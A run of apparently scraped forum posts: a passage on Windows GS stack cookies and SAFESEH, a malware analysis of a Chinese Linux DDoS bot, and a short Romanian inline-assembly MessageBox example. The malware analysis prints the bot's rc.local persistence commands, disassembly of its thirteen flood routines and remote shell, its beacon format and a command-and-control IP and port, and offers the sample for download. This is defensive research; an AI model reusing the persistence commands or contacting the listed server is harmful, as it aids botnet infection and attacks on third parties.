[ebp+SystemTimeAsFileTime.dwHighDateTime], 0 .text:00402694 push ebx .text:00402695 push edi .text:00402696 mov edi, 0BB40E64Eh .text:0040269B mov ebx, 0FFFF0000h .text:004026A0 cmp eax, edi .text:004026A2 jz short loc_4026B1 .text:004026A4 test ebx, eax .text:004026A6 jz short loc_4026B1 .text:004026A8 not eax .text:004026AA mov dword_408004, eax .text:004026AF jmp short loc_402716 .text:004026B1 ; --------------------------------------------------------------------------- .text:004026B1 .text:004026B1 loc_4026B1: ; CODE XREF: ___security_init_cookie+23#j .text:004026B1 ; ___security_init_cookie+27#j .text:004026B1 push esi .text:004026B2 lea eax, [ebp+SystemTimeAsFileTime] .text:004026B5 push eax ; lpSystemTimeAsFileTime .text:004026B6 call ds:GetSystemTimeAsFileTime .text:004026BC mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime] .text:004026BF xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime] .text:004026C2 call ds:GetCurrentProcessId .text:004026C8 xor esi, eax .text:004026CA call ds:GetCurrentThreadId .text:004026D0 xor esi, eax .text:004026D2 call ds:GetTickCount .text:004026D8 xor esi, eax .text:004026DA lea eax, [ebp+PerformanceCount] .text:004026DD push eax ; lpPerformanceCount .text:004026DE call ds:QueryPerformanceCounter .text:004026E4 mov eax, dword ptr [ebp+PerformanceCount+4] .text:004026E7 xor eax, dword ptr [ebp+PerformanceCount] .text:004026EA xor esi, eax .text:004026EC cmp esi, edi .text:004026EE jnz short loc_4026F7 .text:004026F0 mov esi, 0BB40E64Fh .text:004026F5 jmp short loc_402707 .text:004026F7 ; --------------------------------------------------------------------------- .text:004026F7 .text:004026F7 loc_4026F7: ; CODE XREF: ___security_init_cookie+6F#j .text:004026F7 test ebx, esi .text:004026F9 jnz short loc_402707 .text:004026FB mov eax, esi .text:004026FD or eax, 4711h .text:00402702 shl eax, 10h .text:00402705 or esi, eax .text:00402707 .text:00402707 loc_402707: ; CODE XREF: ___security_init_cookie+76#j .text:00402707 ; ___security_init_cookie+7A#j .text:00402707 mov ___security_cookie, esi .text:0040270D not esi .text:0040270F mov dword_408004, esi .text:00402715 pop esi .text:00402716 .text:00402716 loc_402716: ; CODE XREF: ___security_init_cookie+30#j .text:00402716 pop edi .text:00402717 pop ebx .text:00402718 leave .text:00402719 retn .text:00402719 ___security_init_cookie endp Firstly, it will compare __security_cookie with the default value: mov edi, 0BB40E64Eh mov ebx, 0FFFF0000h And if matched it will continue to generate a random one. The random value for __security_cookie is generated as a combination of xors for time, processid, threadid, tickcount and QueryPerformanceCounter() values. And then xored and multiplied. or eax, 4711h shl eax, 10h In the epilogue of a function protected by GS stack cookie you will see a call to __security_check_cookie() function which verifies the __security_cookie, and if it is manipulated the process terminates. So done in this way before returning to the attacker controlled area which leverages ret instruction is prevented. SAFESEH SAFESEH was added from Windows XP Sp2. It is an operating system protection technique by which we can protect against SEH overwrites. This technique isn’t available on 64 bit systems, as 64 bit Windows uses a different mechanism for exception handling, which is quite similar to what is used on SAFESEH. A binary is only protected by SAFESEH only if it is explicitly mentioned on the PE header. To check the existence of that header, we can use the Dumpbin tool by Microsoft by using the following command line: dumpbin sample.exe /LOADCONFIG File Type: EXECUTABLE IMAGE Section contains the following load config: 00000048 size 0 time date stamp 0.00 Version 0 GlobalFlags Clear 0 GlobalFlags Set 0 Critical Section Default Timeout 0 Decommit Free Block Threshold 0 Decommit Total Free Threshold 00000000 Lock Prefix Table 0 Maximum Allocation Size 0 Virtual Memory Threshold 0 Process Heap Flags 0 Process Affinity Mask 0 CSD Version 0000 Reserved 00000000 Edit list 00408310 Security Cookie 00407840 Safe Exception Handler Table 3 Safe Exception Handler Count Safe Exception Handler Table Address ——– 00402390 00403FD0 00405040 When an exception occurs, th exception is transferred to the SAFESEH handler in ntdll.dll and it checks if the exception target is present in the SAFESEH list. Following is the implementation of RtlCaptureImageExceptionValues on Windows XP sp2. If the target address isn’t present in the list, then RtlCallKernel32UnhandledExceptionFilter is called to terminate the program. Source/url]
-
The malware is not Elknot, IptabLesx or Billgates, is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one..so the next variant maybe more..). Originated from China, with the spreading method via ssh hacking. The malware firstly spotted few times in mid 2014. This sample is not the first sample/new one. This sample was served in the panel below, noted: just being released sample: Some notes: Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474) Accept-Language: zh-cn Accept-Language: zh-CN Autostart installation: sed -i -e '/%s/d' /etc/rc.local sed -i -e '2 i%s/%s' /etc/rc.local sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local sed -i -e '2 i%s/%s start' /etc/init.d/boot.local Source files (unstripped) File : 'crtstuff.c' File : 'AES.cpp' File : 'main.cpp' File : 'eh_personality.cc' File : 'eh_alloc.cc' File : 'eh_exception.cc' File : 'eh_call.cc' File : 'pure.cc' File : 'eh_globals.cc' File : 'del_op.cc' File : 'eh_catch.cc' File : 'class_type_info.cc' File : 'allocator-inst.cc' File : 'string-inst.cc' File : 'eh_terminate.cc' File : 'eh_term_handler.cc' File : 'si_class_type_info.cc' File : 'eh_throw.cc' File : 'eh_unex_handler.cc' File : 'vterminate.cc' File : 'tinfo.cc' File : 'new_op.cc' File : 'eh_type.cc' File : 'cp-demangle.c' File : 'functexcept.cc' File : 'regex.cc' File : 'system_error.cc' File : 'functional.cc' File : 'future.cc' File : 'new_handler.cc' File : 'bad_typeid.cc' File : 'bad_alloc.cc' File : 'eh_ptr.cc' File : 'guard.cc' File : 'guard_error.cc' File : 'bad_cast.cc' File : 'ios_failure.cc' File : 'stdexcept.cc' File : 'condition_variable.cc' File : 'mutex.cc' File : 'thread.cc' File : 'unwind-dw2.c' File : 'unwind-dw2-fde-dip.c' File : 'libgcc2.c' File : 'unwind-c.c' Some PoC of AES: .text:0804832C ; AES::AES(unsigned char *) .text:0804832C public _ZN3AESC2EPh ;; .text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char [4][4]) .text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h ;; DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood ;; DDOS 1 0x0804EE62: mov eax, [ebp+arg_0] mov eax, [eax+18Ch] cmp eax, 28h jg short 0x0804EE9D mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create jmp short 0x0804EEC8 ;; DDOS 2 0x0804EE9D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create ;; DDOS 3 0x0804EEED: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 4 0x0804EF3D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 5 0x0804EF8D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 6 0x0804EFDD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 7 0x0804F02D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 8 0x0804F07D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 9 0x0804F0CD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 10 0x0804F11D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 11 0x0804F16D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 12 0x0804F1BD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 13 0x0804F20A: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 System command interface for execution.. this is bad...hacked server can be used as RAT .text:0x0804E6C2 ; Cmdshell(_MSGHEAD *) .text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD .text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near .text:0x0804E6C2 .text:0x0804E6C2 arg_0= dword ptr 8 .text:0x0804E6C2 .text:0x0804E6C2 push ebp .text:0x0804E6C3 mov ebp, esp .text:0x0804E6C5 sub esp, 18h .text:0x0804E6C8 mov eax, [ebp+arg_0] .text:0x0804E6CB add eax, 100h .text:0x0804E6D0 mov [esp], eax .text:0x0804E6D3 call system .text:0x0804E6D8 leave .text:0x0804E6D9 retn .text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp .text:0x0804E6D9 We can expect CPU info with below format will be sent to remote: :` .text:0x080509E2 lea eax, [ebp+var_1110] .text:0x080509E8 add eax, 68h .text:0x080509EB mov [esp+4], eax .text:0x080509EF lea eax, [ebp+var_1110] .text:0x080509F5 add eax, 64h .text:0x080509F8 mov [esp], eax .text:0x080509FB call _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *) .text:0x08050A00 lea eax, [ebp+var_11D0] .text:0x08050A06 mov [esp], eax .text:0x08050A09 call sysinfo .text:0x08050A0E mov [ebp+var_24], eax .text:0x08050A11 mov eax, [ebp+var_11C0] .text:0x08050A17 shr eax, 14h .text:0x08050A1A mov [ebp+var_10A4], eax .text:0x08050A20 mov edx, [ebp+var_11C0] .text:0x08050A26 mov eax, [ebp+var_11BC] .text:0x08050A2C mov ecx, edx .text:0x08050A2E sub ecx, eax .text:0x08050A30 mov eax, ecx .text:0x08050A32 shr eax, 14h .text:0x08050A35 mov [ebp+var_10A0], eax .text:0x08050A3B lea ebx, [ebp+var_43C] .text:0x08050A41 mov eax, 0 .text:0x08050A46 mov edx, 100h .text:0x08050A4B mov edi, ebx .text:0x08050A4D mov ecx, edx .text:0x08050A4F rep stosd .text:0x08050A51 mov ebx, [ebp+var_10A0] .text:0x08050A57 mov ecx, [ebp+var_10A4] .text:0x08050A5D mov edx, [ebp+var_10A8] .text:0x08050A63 mov eax, [ebp+var_10AC] .text:0x08050A69 mov dword ptr [esp+20h], offset aHacker ; "Hacker" .text:0x08050A71 mov [esp+1Ch], ebx .text:0x08050A75 mov [esp+18h], ecx .text:0x08050A79 mov [esp+14h], edx .text:0x08050A7D mov [esp+10h], eax .text:0x08050A81 lea eax, [ebp+var_1110] .text:0x08050A87 mov [esp+0Ch], eax .text:0x08050A8B mov dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"... .text:0x08050A93 mov dword ptr [esp+4], 400h .text:0x08050A9B lea eax, [ebp+var_43C] .text:0x08050AA1 mov [esp], eax .text:0x08050AA4 call snprintf .text:0x08050AA9 mov eax, ds:MainSocket .text:0x08050AAE test eax, eax CNC: sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215") Loc: 119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK DOWNLOAD Pass: infected Source
-
A fost un mic pariu cu @Usr6.M-am gandit sa il postez aici pentru cine vrea sa foloseasca functii din windows.h in asm. #include "windows.h" char a2[]="usr6"; char a3[]="Salut"; int main() { __asm { mov eax,0 push eax mov eax,offset a3 push eax mov eax,offset a2 push eax mov eax,0 push eax call DWORD PTR MessageBox pop ebx pop ebx pop ebx pop ebx } }